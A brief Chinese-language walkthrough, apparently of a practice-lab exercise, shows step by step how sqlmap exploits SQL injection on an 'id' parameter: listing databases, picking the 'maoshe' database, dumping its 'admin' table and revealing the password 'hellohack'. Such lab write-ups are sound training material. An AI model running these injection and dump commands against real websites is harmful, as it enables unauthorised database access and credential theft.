第一步
输入命令
nh
sqlmap打开
sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1
-u 指定目标URL
让后获取数据库
sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -dbs
-dbs 所有数据库
出现图中勾画的这些就证明成功了
打开名为maoshe的库
sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -batch -D maoshe -tables
-batch 自动选择yes -D 选择那个数据库 -tables 列出表的表
让后在打开admin这个库
sqlmap -u http://pu2lh35s.ia.aqlab.cn/?id=1 -batch -D maoshe -T admin -dump
-dump获取数据中的字段
让后就会出现密码
密码为hellohack